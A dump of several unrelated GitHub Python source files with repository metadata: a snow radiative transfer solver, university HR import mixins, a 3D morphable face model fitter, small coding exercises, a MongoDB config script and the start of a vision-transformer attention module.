np.zeros([nbr_lyr*2,nbr_wvl])\n\n for i in np.arange(0,2*nbr_lyr,1):\n if i ==0:\n Y[0,:] = DS[0,:]\n else:\n Y[i,:] = DS[i,:] - (AS[i,:]*Y[i-1,:])\n\n \n #############################################################\n # CALCULATE DIRECT BEAM FLUX AT BOTTOM OF EACH LAYER\n\n # loop through layers\n for i in np.arange(0,nbr_lyr,1):\n\n # (Toon et al. eq 50)\n direct[i,:] = mu_not * np.pi * Fs * np.exp(-(tau_clm[i,:] + tau_star[i,:]) / mu_not)\n\n # net flux (positive upward = F_up - F_down) at the base of each layer (Toon et al. Eq 48)\n F_net[i,:] = (Y[2*i,:] * (e1[i,:]-e3[i,:])) + (Y[2*i+1,:] * (e2[i,:] - e4[i,:])) + C_pls_btm[i,:] - C_mns_btm[i,:] - direct[i,:]\n\n # mean intensity at the base of each layer (Toon et al. Eq 49)\n intensity[i,:] = (1/mu_one) * (Y[2*i,:] * (e1[i,:] + e3[i,:]) + Y[2*i+1,:] * (e2[i,:] + e4[i,:]) + C_pls_btm[i,:] + C_mns_btm[i,:]) + (direct[i,:]/mu_not)\n intensity[i, :] = intensity[i, :] / (4 * np.pi)\n\n\n # Upward flux at upper model boundary (Toon et al Eq 31)\n F_top_pls = (Y[0,:] * (np.exp(-lam[0,:] * tau_star[0,:]) + GAMMA[0,:])) + (Y[1,:] * (np.exp(-lam[0,:] * tau_star[0,:])-GAMMA[0,:])) + C_pls_top[0,:]\n\n\n for i in np.arange(0,nbr_lyr,1):\n # Upward flux at the bottom of each layer interface (Toon et al. Eq31)\n F_up[i,:] = Y[2*i,:] * (np.exp(0) + GAMMA[i,:] * np.exp(-lam[i,:] * tau_star[i,:])) + Y[2*i+1,:] * (np.exp(0) - GAMMA[i,:] * np.exp(-lam[i,:] * tau_star[i,:])) + C_pls_btm[i,:]\n\n # Downward flux at the bottom of each layer interface (Toon et al. Eq32) plus direct beam component\n F_down[i,:] = Y[2*i,:] * (GAMMA[i,:] * np.exp(0) + np.exp(-lam[i,:] * tau_star[i,:])) + Y[2*i+1,:] * (GAMMA[i,:] * np.exp(0) - np.exp(-lam[i,:] * tau_star[i,:])) + C_mns_btm[i,:] + direct[i,:]\n\n # Derived net (upward-downward) flux (should equal F_net)\n F_net2[i,:] = F_up[i,:] - F_down[i,:]\n\n intensity2[i,:] = F_up[i,:] + F_down[i,:]\n \n # surface planar intensity\n intensity2_top[:] = F_top_pls + ((mu_not * np.pi * Fs) + Fd)\n\n # Net flux at lower model boundary = bulk transmission through entire media\n # = energy absorbed by underlying surface\n F_btm_net[0,:] = -F_net[nbr_lyr-1,:]\n\n # Hemispheric wavelength-dependent albedo\n albedo = F_top_pls/ ((mu_not * np.pi * Fs)+ Fd)\n\n # Net flux at upper model boundary\n F_top_net[0,:] = F_top_pls - ((mu_not * np.pi * Fs) + Fd)\n\n # absorbed flux in each layer (negative if there is net emission (bnd_typ = 4))\n for i in np.arange(0,nbr_lyr,1):\n if i ==0:\n F_abs[0,:] = F_net[0,:]-F_top_net\n else:\n F_abs[i,:] = F_net[i,:] - F_net[i-1,:]\n\n # set indices for constraining calculations to VIS and NIR bands\n vis_max_idx = 39\n nir_max_idx = len(wvl)\n\n # Spectrally-integrated absorption in each layer:\n abs_slr = np.sum(F_abs,axis=1)\n\n for i in np.arange(0,nbr_lyr,1):\n abs_vis[i] = np.sum(F_abs[i,0:vis_max_idx])\n abs_nir[i] = np.sum(F_abs[i,vis_max_idx:nir_max_idx])\n\n # Spectrally - integrated absorption by underlying surface:\n abs_slr_btm = sum(np.squeeze(F_btm_net))\n abs_vis_btm = sum(np.squeeze(F_btm_net[0:vis_max_idx]))\n abs_nir_btm = sum(np.squeeze(F_btm_net[0,vis_max_idx:nir_max_idx]))\n\n # Calculate radiative heating rate in kelvin per second.\n # Multiply by 3600 to convert to K per hour\n # specfic heta capacity of ice = 2117 J kg-1 K-1\n heat_rt = abs_slr / (L_snw * 2117) # [K / s]\n heat_rt = heat_rt * 3600 # [K / hr]\n\n # Energy conservation check:\n # % Incident direct + diffuse radiation equals(absorbed + transmitted + bulk_reflected)\n energy_sum = (mu_not * np.pi * Fs) + Fd - (sum(F_abs) + F_btm_net + F_top_pls)\n\n # spectrally-integrated terms:\n # energy conservation total error\n energy_error = abs(np.sum(energy_sum))\n\n if energy_error > 1e-10:\n energy_conservation_error = np.sum(abs(energy_sum))\n print(f\"CONSERVATION OF ENERGY ERROR OF {energy_conservation_error}\")\n\n ######################################\n # Re-alias results for outputting\n ######################################\n\n # total incident insolation(Wm - 2)\n total_insolation = np.sum((mu_not * np.pi * Fs) + Fd)\n\n # energy absorbed by all snow layers\n abs_slr_tot = np.sum(np.sum(F_abs))\n\n # energy absorbed by underlying substrate\n energy_abs_under_sfc = np.sum(F_btm_net)\n\n # Spectrally - integrated solar, visible, and NIR albedos:\n BBA = np.sum(flx_slr * albedo) / np.sum(flx_slr)\n\n BBAVIS = sum(flx_slr[0:vis_max_idx]*albedo[0:vis_max_idx])/ sum(flx_slr[0:vis_max_idx])\n\n BBANIR = sum(flx_slr[vis_max_idx:nir_max_idx]*albedo[vis_max_idx: nir_max_idx]) / sum(flx_slr[vis_max_idx:nir_max_idx])\n\n # % Spectrally - integrated VIS and NIR total snowpack absorption:\n abs_vis_tot = sum(flx_slr[0:vis_max_idx]*(1 - albedo[0:vis_max_idx]))\n abs_nir_tot = sum(flx_slr[vis_max_idx:nir_max_idx]*(1 - albedo[vis_max_idx:nir_max_idx]))\n\n return wvl, albedo, BBA, BBAVIS, BBANIR, abs_slr, abs_slr_tot, abs_vis_tot, heat_rt, total_insolation\n","repo_name":"jmcook1186/bioDISORTpy","sub_path":"snicar8d_GO.py","file_name":"snicar8d_GO.py","file_ext":"py","file_size_in_byte":24193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"43244904795","text":"import logging\nfrom Cerebrum.modules.hr_import.employee_import import EmployeeImportBase\n\nfrom leader_groups import ManagerGroupSync\nfrom reservation_group import ReservationGroupUpdater\nfrom account_type import AccountTypeUpdater\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_affiliations(db_object, account_types):\n return set(\n (r['affiliation'], r['status'], r['ou_id'])\n for r in db_object.list_affiliations(\n person_id=db_object.entity_id,\n affiliation=account_types.restrict_affiliation,\n source_system=account_types.restrict_source))\n\n\nclass AccountTypeMixin(EmployeeImportBase):\n \"\"\"\n Import mixin that tries to update account types on affiliation change.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(AccountTypeMixin, self).__init__(*args, **kwargs)\n # Account type updater\n self._account_update = AccountTypeUpdater(\n self.db,\n restrict_affiliation=self.const.affiliation_ansatt,\n restrict_source=self.source_system)\n\n def update(self, hr_object, db_object):\n # Track aff changes in parent.update()\n affs_before = _get_affiliations(db_object, self._account_update)\n super(AccountTypeMixin, self).update(hr_object, db_object)\n affs_after = _get_affiliations(db_object, self._account_update)\n\n # Try to update account types on change\n if affs_before != affs_after:\n added_affs = affs_after - affs_before\n removed_affs = affs_before - affs_after\n logger.debug('AccountTypeMixin aff changes: added=%s, removed=%s',\n repr(added_affs), repr(removed_affs))\n self._account_update.sync(db_object, added=added_affs,\n removed=removed_affs)\n\n def remove(self, hr_object, db_object):\n # Track aff changes in parent.remove()\n affs_before = _get_affiliations(db_object, self._account_update)\n super(AccountTypeMixin, self).remove(hr_object, db_object)\n affs_after = _get_affiliations(db_object, self._account_update)\n\n # Try to update account types on change\n if affs_before != affs_after:\n added_affs = affs_after - affs_before\n removed_affs = affs_before - affs_after\n logger.debug('AccountTypeMixin aff changes: added=%s, removed=%s',\n repr(added_affs), repr(removed_affs))\n self._account_update.sync(db_object, added=added_affs,\n removed=removed_affs)\n\n\nclass ManagerGroupMixin(EmployeeImportBase):\n \"\"\"\n Import mixin that tries to update manager groups according to a\n `hr_object.leader_ous` attribute.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ManagerGroupMixin, self).__init__(*args, **kwargs)\n # Manager group sync\n self._mgr_groups = ManagerGroupSync(self.db)\n\n def update(self, hr_object, db_object):\n super(ManagerGroupMixin, self).update(hr_object, db_object)\n\n # Manager org unit itentifiers\n manager_ou_ids = tuple(hr_object.leader_ous)\n logger.debug('ManagerGroupMixin: manager at ou=%s',\n repr(manager_ou_ids))\n\n # Find org units and update\n ou_objects = tuple(self._get_ou(ou_id_pairs)\n for ou_id_pairs in manager_ou_ids)\n self._mgr_groups.sync(db_object.entity_id, ou_objects)\n\n def remove(self, hr_object, db_object):\n super(ManagerGroupMixin, self).remove(hr_object, db_object)\n # Remove all org-manager group memberships\n logger.debug('ManagerGroupMixin: removing manager positions')\n self._mgr_groups.sync(db_object.entity_id, set())\n\n\nclass ReservationGroupMixin(EmployeeImportBase):\n \"\"\"\n Import mixin that tries to update reservation groups according to a\n `hr_object.reserved` attribute.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(ReservationGroupMixin, self).__init__(*args, **kwargs)\n # Reservation group sync\n self._reservation_group = ReservationGroupUpdater(self.db)\n\n def update(self, hr_object, db_object):\n super(ReservationGroupMixin, self).update(hr_object, db_object)\n # Update reservation group if flag is set\n is_reserved = hr_object.reserved\n logger.debug('ReservationGroupMixin: is-reserved=%s',\n repr(is_reserved))\n self._reservation_group.set(db_object.entity_id, is_reserved)\n\n def remove(self, hr_object, db_object):\n super(ReservationGroupMixin, self).remove(hr_object, db_object)\n # Remove public catalog reservation\n logger.debug('ReservationGroupMixin: removing reservations')\n self._reservation_group.set(db_object.entity_id, False)\n\n\nclass UioEmployeeImportMixin(AccountTypeMixin, ManagerGroupMixin,\n ReservationGroupMixin, EmployeeImportBase):\n pass\n","repo_name":"unioslo/cerebrum","sub_path":"Cerebrum/modules/no/uio/hr_import/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"25239497326","text":"import numpy as np\r\nimport scipy.io as sio\r\nimport utility\r\nimport fitting\r\nimport cv2\r\nimport matplotlib as plt\r\nimport sys\r\nimport time \r\n\r\nclass morphable_model(object): \r\n \r\n def __init__(self, path):\r\n '''\r\n Parameters\r\n ----------\r\n shapeMU, expMU: (3*nver, 1)\r\n shapePC: (3*nver, nshape), nshape=199\r\n expPC: (3*nver, nexp), nexp=29\r\n texPC: (3*nver, ntex), ntex=199\r\n tri: (ntri, 3)\r\n kpt_idx: (1, 68)\r\n \r\n '''\r\n super(morphable_model, self).__init__()\r\n self.model = sio.loadmat(path)\r\n self.model = self.model['model']\r\n self.model = self.model[0,0]\r\n \r\n self.shapeMU = self.model['shapeMU']\r\n self.shapePC = self.model['shapePC']\r\n self.shapeEV = self.model['shapeEV']\r\n self.expMU = self.model['expMU']\r\n self.expPC = self.model['expPC']\r\n self.expEV = self.model['expEV']\r\n self.fullMU = self.shapeMU + self.expMU\r\n \r\n self.texMU = self.model['texMU']\r\n self.texPC = self.model['texPC']\r\n self.texEV = self.model['texEV']\r\n \r\n self.tri = self.model['tri'].T - 1\r\n self.mouth_tri = self.model['tri_mouth'].T - 1\r\n self.full_tri = np.vstack((self.tri, self.mouth_tri))\r\n self.kpt_idx = self.model['kpt_idx'].astype(np.int32)-1\r\n \r\n self.nver = int(self.shapeMU.shape[0]/3)\r\n self.ntri = self.tri.shape[0]\r\n self.nshape = self.shapePC.shape[1]\r\n self.nexp = self.expPC.shape[1]\r\n self.ntex = self.texPC.shape[1]\r\n \r\n self.laplacian_matrix = np.eye(self.nver, dtype=np.float32)\r\n for i in range(self.nver):\r\n self.laplacian_matrix[i][i] = -1\r\n for face in self.tri:\r\n self.laplacian_matrix[face[0]][face[1]] = 1\r\n self.laplacian_matrix[face[0]][face[2]] = 1\r\n self.laplacian_matrix[face[1]][face[0]] = 1\r\n self.laplacian_matrix[face[1]][face[2]] = 1\r\n self.laplacian_matrix[face[2]][face[0]] = 1\r\n self.laplacian_matrix[face[2]][face[1]] = 1\r\n for i in range(self.nver):\r\n summation = np.sum(self.laplacian_matrix[i]) + 1\r\n idx = np.where(self.laplacian_matrix[i]==1)\r\n self.laplacian_matrix[i][idx] /= summation \r\n \r\n def generate_para(self, type, flag):\r\n if type == \"shape\":\r\n if flag:\r\n para = np.random.uniform(1e04, 4e05, (self.nshape, 1))\r\n else:\r\n para = np.zeros((self.nshape, 1))\r\n return para\r\n \r\n elif type == \"tex\":\r\n if flag:\r\n para = np.random.uniform(size = (self.ntex, 1))\r\n else:\r\n para = np.zeros((self.ntex, 1))\r\n return para\r\n \r\n elif type == \"exp\":\r\n if flag:\r\n para = np. random.uniform(size = (self.nexp, 1))\r\n else:\r\n para = np.zeros((self.nexp, 1))\r\n return para\r\n \r\n else: \r\n print(\"input type error\")\r\n sys.exit()\r\n \r\n \r\n def generate_vertices(self, shape_para, exp_para=0):\r\n vertices = self.fullMU + self.shapePC @ shape_para + self.expPC @ exp_para\r\n vertices = np.reshape(vertices, (self.nver, 3))\r\n return vertices\r\n \r\n def generate_tex(self, tex_para):\r\n tex = self.texMU + self.texPC @ tex_para\r\n tex = np.reshape(tex, (self.nver, 3))\r\n return tex\r\n \r\n def transform(self, vertices, f, R, t):\r\n trans_vertices = f * vertices @ R.T + t[np.newaxis,:]\r\n return trans_vertices\r\n \r\n \r\n def fit(self, kpt, tol=1e-4, iteration=10):\r\n '''\r\n Parameters:\r\n tol: error tolerance\r\n kpt: [68, 2], 2d position of input images\r\n kpt_vertices: [68, 3], 3d position of fixed landmarks\r\n fitting ||Xproject - kpt||^2 + l2 norm,\r\n where Xproject = f*P*R*kpt_vertices + t[:2]\r\n '''\r\n \r\n #-- init\r\n shape_para = np.zeros((self.nshape, 1), dtype = np.float32)\r\n exp_para = np.zeros((self.nexp, 1), dtype = np.float32)\r\n \r\n #-------------------- estimate\r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[2, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n fullMU = self.fullMU[valid_idx, :]\r\n shapePC = self.shapePC[valid_idx, :]\r\n expPC = self.expPC[valid_idx, :]\r\n \r\n \r\n for i in range(iteration):\r\n start = time.time()\r\n kpt_vertices = fullMU + shapePC @ shape_para + expPC @ exp_para\r\n kpt_vertices = np.reshape(kpt_vertices, (int(len(kpt_vertices)/3), 3))\r\n\r\n P = fitting.get_affine_matrix(kpt_vertices, kpt)\r\n f, R, t = fitting.P2Rft(P)\r\n\r\n shape = shapePC @ shape_para\r\n shape = np.reshape(shape, [int(len(shape)/3), 3]).T\r\n intact_shape = self.shapePC @ shape_para\r\n intact_shape = np.reshape(intact_shape, [int(len(intact_shape)/3), 3]).T\r\n exp_para = fitting.optim_regression(kpt.T, fullMU, expPC, self.expEV, shape, f, R, t[:2], intact_shape, self.expPC, self.laplacian_matrix, self.fullMU, lamb=100, type='exp')\r\n \r\n expression = expPC @ exp_para\r\n expression = np.reshape(expression, [int(len(expression)/3), 3]).T\r\n intact_exp = self.expPC @ exp_para\r\n intact_exp = np.reshape(intact_exp, [int(len(intact_exp)/3), 3]).T\r\n shape_para = fitting.optim_regression(kpt.T, fullMU, shapePC, self.shapeEV, expression, f, R, t[:2], intact_exp, self.shapePC, self.laplacian_matrix, self.fullMU, lamb=1, type='shape')\r\n \r\n err = fitting.err(kpt_vertices, kpt, shape_para, exp_para, f, R, t)\r\n print(\"shape err: %f\"%err)\r\n if err < tol:\r\n break\r\n end = time.time()\r\n print('{} time cost:{}'.format(i, end-start))\r\n \r\n return shape_para, exp_para, f, R, t\r\n\r\n def frame_smooth_fit(self, pre_shape_para, pre_exp_para, kpt, iteration=100):\r\n '''\r\n it's a fitting process adding frame smooth regularization, we don't need eigenvalue as prior condition\r\n '''\r\n shape_para = pre_shape_para\r\n exp_para = pre_exp_para\r\n \r\n #-------------------- estimate\r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[2, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n fullMU = self.fullMU[valid_idx, :]\r\n shapePC = self.shapePC[valid_idx, :]\r\n expPC = self.expPC[valid_idx, :]\r\n \r\n for i in range(iteration):\r\n kpt_vertices = fullMU + shapePC @ shape_para + expPC @ exp_para\r\n kpt_vertices = np.reshape(kpt_vertices, (int(len(kpt_vertices)/3), 3))\r\n\r\n P = fitting.get_affine_matrix(kpt_vertices, kpt)\r\n f, R, t = fitting.P2Rft(P)\r\n\r\n shape = shapePC @ shape_para\r\n shape = np.reshape(shape, [int(len(shape)/3), 3]).T\r\n exp_para = fitting.smooth_optim(kpt.T, fullMU, expPC, pre_exp_para, shape, f, R, t[:2], lamb=1e-6, type='exp')\r\n\r\n expression = expPC @ exp_para\r\n expression = np.reshape(expression, [int(len(expression)/3), 3]).T\r\n shape_para = fitting.smooth_optim(kpt.T, fullMU, shapePC, pre_shape_para, expression, f, R, t[:2], lamb=1e-6, type='shape')\r\n \r\n err = fitting.err(kpt_vertices, kpt, shape_para, exp_para, f, R, t)\r\n print(\"shape err: %f\"%err)\r\n \r\n return shape_para, exp_para, f, R, t\r\n \r\n def exp_fit(self, shape_para, kpt, tol=1e-4, iteration=10):\r\n '''\r\n Parameters:\r\n tol: error tolerance\r\n kpt: [68, 2], 2d position of input images\r\n kpt_vertices: [68, 3], 3d position of fixed landmarks\r\n fitting ||Xproject - kpt||^2 + l2 norm,\r\n where Xproject = f*P*R*kpt_vertices + t[:2]\r\n '''\r\n \r\n #-- init\r\n exp_para = np.zeros((self.nexp, 1), dtype = np.float32)\r\n \r\n #-------------------- estimate\r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[2, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n fullMU = self.fullMU[valid_idx, :]\r\n shapePC = self.shapePC[valid_idx, :]\r\n expPC = self.expPC[valid_idx, :]\r\n \r\n for i in range(iteration):\r\n kpt_vertices = fullMU + shapePC @ shape_para + expPC @ exp_para\r\n kpt_vertices = np.reshape(kpt_vertices, (int(len(kpt_vertices)/3), 3))\r\n\r\n P = fitting.get_affine_matrix(kpt_vertices, kpt)\r\n f, R, t = fitting.P2Rft(P)\r\n\r\n shape = shapePC @ shape_para\r\n shape = np.reshape(shape, [int(len(shape)/3), 3]).T\r\n exp_para = fitting.optim_regression(kpt.T, fullMU, expPC, self.expEV, shape, f, R, t[:2], lamb=50, type='exp')\r\n \r\n err = fitting.err(kpt_vertices, kpt, shape_para, exp_para, f, R, t)\r\n print(\"shape err: %f\"%err)\r\n if err < tol:\r\n break\r\n \r\n return exp_para, f, R, t \r\n \r\n def tex_fit(self, kpt, lamb=0, tol=1e-4, iteration=10):\r\n '''\r\n Parameters\r\n ----------\r\n kpt: [68, 3], rgb of keypoints of input images\r\n fitting ||kpt_tex - kpt||^2 + l2norm,\r\n where kpt_tex = texMU + texPC * tex_para\r\n \r\n Returns\r\n -------\r\n tex_para: [ntex, 1]\r\n '''\r\n # init\r\n tex_para = np.zeros((self.ntex, 1), dtype=np.float32)\r\n \r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[1, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n texMU = self.texMU[valid_idx, :]\r\n texPC = self.texPC[valid_idx, :]\r\n \r\n kpt_copy = kpt.copy()\r\n kpt_copy = np.reshape(kpt_copy, (kpt_copy.shape[0]*kpt_copy.shape[1], 1)) \r\n # linear regression \r\n expression_left = texPC.T @ texPC + lamb*np.diagflat(1/self.texEV**2)\r\n expression_right = texPC.T @ (texMU - kpt_copy)\r\n tex_para = np.linalg.solve(expression_left, expression_right)\r\n \r\n # # gradient descent\r\n # for i in range(iteration):\r\n # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # tex_para = tex_para - lamb*grad\r\n # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n \r\n \r\n # # nesterov momentum\r\n # Vdw = 0; beta = 0.5\r\n # for i in range(iteration):\r\n # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # Vdw = beta*Vdw + (1-beta)*grad\r\n # tex_para = tex_para - lamb*Vdw\r\n # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n return tex_para\r\n \r\n def tex_fine_fit(self, tex_para, valid_index, kpt, lamb=0, tol=1e-4, iteration=10):\r\n '''\r\n Parameters\r\n ----------\r\n tex_para: roughly fitted tex parameters[ntex, 1]\r\n kpt: full images rgb\r\n \r\n Returns\r\n -------\r\n '''\r\n kpt_copy = kpt.copy()\r\n kpt_copy = np.reshape(kpt_copy, (-1, 1))\r\n \r\n # # GD\r\n # for i in range(iteration):\r\n # grad = self.texPC.T @ (self.texMU - kpt_copy + self.texPC@tex_para)\r\n # tex_para = tex_para - lamb*grad/grad.shape[0]\r\n # err = np.sum((kpt_copy - self.texMU - self.texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n \r\n # nesterov momentum\r\n Vdw = 0; beta = 0.9; eta=1e5\r\n texMU_masked = self.texMU[valid_index, :]\r\n texPC_masked = self.texPC[valid_index, :]\r\n for i in range(iteration):\r\n grad = texPC_masked.T @ (texMU_masked - kpt_copy + texPC_masked@tex_para) + eta*np.diagflat(1/self.texEV**2)@tex_para\r\n Vdw = beta*Vdw + (1-beta)*grad\r\n tex_para = tex_para - lamb*Vdw/Vdw.shape[0]\r\n err = np.sum((kpt_copy - texMU_masked - texPC_masked@tex_para)**2) / np.sum(kpt_copy**2)\r\n if err < tol:\r\n break\r\n print(err)\r\n \r\n return tex_para\r\n \r\n # def tex_last_fit(self, tex_para, kpt, lamb=0, tol=1e-4, iteration=10):\r\n # '''\r\n # Parameters\r\n # ----------\r\n # tex_para: roughly fitted tex parameters[ntex, 1]\r\n # kpt: full images rgb\r\n \r\n # Returns\r\n # -------\r\n # ''' \r\n # kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n # kpt3d[1, :] += 1\r\n # kpt3d[1, :] += 2\r\n # valid_idx = kpt3d.flatten('F')\r\n \r\n # texMU = self.texMU[valid_idx, :]\r\n # texPC = self.texPC[valid_idx, :]\r\n \r\n # kpt_copy = kpt.copy()\r\n # kpt_copy = np.reshape(kpt_copy, (kpt_copy.shape[0]*kpt_copy.shape[1], 1)) \r\n \r\n # # gradient descent\r\n # for i in range(iteration):\r\n # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # tex_para = tex_para - lamb*grad\r\n # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n \r\n # # # nesterov momentum\r\n # # Vdw = 0; beta = 0.5\r\n # # for i in range(iteration):\r\n # # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # # Vdw = beta*Vdw + (1-beta)*grad\r\n # # tex_para = tex_para - lamb*Vdw\r\n # # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # # if err < tol:\r\n # # break\r\n # # print(err)\r\n # return tex_para\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zb-gong/3DMM_related","sub_path":"MMfitting/MModel.py","file_name":"MModel.py","file_ext":"py","file_size_in_byte":14255,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"39752698244","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 28 12:33:00 2020\r\n\r\n@author: gunda\r\n\"\"\"\r\n\r\nclass MovingAverage:\r\n\r\n def __init__(self, size):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.size = size\r\n self.queue = []\r\n\r\n def next(self, val):\r\n self.queue.append(val)\r\n # Calculate the sum of the moving window\r\n window_sum = sum(self.queue[-self.size:])\r\n print(window_sum / min(len(self.queue), self.size))\r\n return window_sum / min(len(self.queue), self.size)\r\n\r\n# Your MovingAverage object will be instantiated and called as such:\r\n# obj = MovingAverage(size)\r\n# param_1 = obj.next(val)\r\n\r\nobj = MovingAverage(3)\r\nobj.next(1)\r\nobj.next(10)\r\nobj.next(3)\r\nobj.next(5)\r\n","repo_name":"gundamace17/LeetCode","sub_path":"Python/0346. Moving Average from Data Stream.py","file_name":"0346. Moving Average from Data Stream.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28730600910","text":"import os\nimport dotenv\nfrom pymongo import MongoClient\n\n\ndotenv.load_dotenv()\n\ndburl = os.getenv('URL')\n\nprint(dburl)\nif not dburl:\n raise ValueError('no tienes url de mongo')\n\nclient = MongoClient(dburl)\ndb = client.get_database()\ncollection = db['WSB_posts']\n","repo_name":"Javi-Python/API-Project","sub_path":"config/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39330403210","text":"def add_time(start, duration, day=None):\n\n\n week_days = [\"sunday\",\"monday\",\"tuesday\",\"wednesday\",\"thursday\",\"friday\",\"saturday\" ]\n \n\n #new time\n start_time = start.split(\" \")[0]\n new_hour = int(start_time.split(\":\")[0]) + int(duration.split(\":\")[0])\n\n new_minutes = int(start_time.split(\":\")[1]) + int(duration.split(\":\")[1])\n if new_minutes > 59:\n new_hour += 1\n new_minutes = new_minutes - 60\n if new_minutes < 10:\n new_minutes = \"0\" + str(new_minutes)\n \n #days later/AMPM\n days_bool = False\n days_later = 0\n\n if new_hour > 11:\n if \"PM\" in start:\n days_later += int(new_hour / 24) + 1\n days_bool = True\n ampm = int(new_hour - 24*(days_later - 1))\n if ampm > 11:\n clock = \"AM\"\n else:\n clock = \"PM\"\n \n if \"AM\" in start:\n days_later = int(new_hour / 24)\n days_bool = True\n ampm = int(new_hour - 24*days_later)\n if ampm > 11:\n clock = \"PM\"\n else:\n clock = \"AM\" \n else:\n if \"PM\" in start:\n clock = \"PM\"\n if \"AM\" in start:\n clock = \"AM\"\n\n if new_hour > 12:\n if new_hour % 12 != 0:\n new_hour = new_hour % 12\n if new_hour % 12 == 0:\n new_hour = 12\n \n new_time = str(new_hour) + \":\" + str(new_minutes)\n\n #days message\n days_message = \"\"\n counting_days = False\n if days_later >= 1:\n counting_days = True\n if counting_days is True:\n if days_later > 1 and days_later != 0:\n days_message = \"(\" + str(days_later) + \" days later\" + \")\"\n elif days_later == 1:\n days_message = \"(next day)\"\n\n\n if day != None:\n which_day = week_days.index(day.lower())\n show_day = week_days[(which_day + days_later) % 7]\n\n output = (new_time + \" \" + clock + (\", \" + show_day.capitalize() if not day is None else \"\") + (\" \" + days_message if days_bool else \"\")).rstrip()\n \n return output","repo_name":"bastosanaa/Scientific-Computing-w-Python-FCC","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73218961531","text":"from functools import partial\nfrom netrc import netrc\nimport torch\nimport torch.nn as nn\nfrom thop import profile\nimport torch.nn.functional as F\nfrom torch.nn import Sequential, Linear, ReLU, GRU\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False): \n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1)\n random_tensor = keep_prob + \\\n torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_()\n output = x.div(keep_prob) * random_tensor\n return output\n\nclass DropPath(nn.Module):\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\ndef Spectra_Embedding(x, spec_length, embed_dim):\n\n batch_size = x.shape[0]\n x = torch.reshape(x, (batch_size, spec_length // embed_dim, embed_dim)) \n return x\n\nclass Attention(nn.Module):\n\n def __init__(self,\n dim, \n num_heads=2,\n qkv_bias=False,\n qk_scale=None,\n attn_drop_ratio=0.,\n proj_drop_ratio=0.):\n super(Attention, self).__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop_ratio)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop_ratio)\n\n def forward(self, x):\n # [batch_size, num_patches + 1, total_embed_dim]\n B, N, C = x.shape \n # qkv(): -> [batch_size, num_patches + 1, 3 * total_embed_dim]\n # reshape: -> [batch_size, num_patches + 1, 3, num_heads, embed_dim_per_head]\n # permute: -> [3, batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n # [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n # make torchscript happy (cannot use tensor as tuple)\n q, k, v = qkv[0], qkv[1], qkv[2]\n # transpose: -> [batch_size, num_heads, embed_dim_per_head, num_patches + 1]\n # @: multiply -> [batch_size, num_heads, num_patches + 1, num_patches + 1]\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = 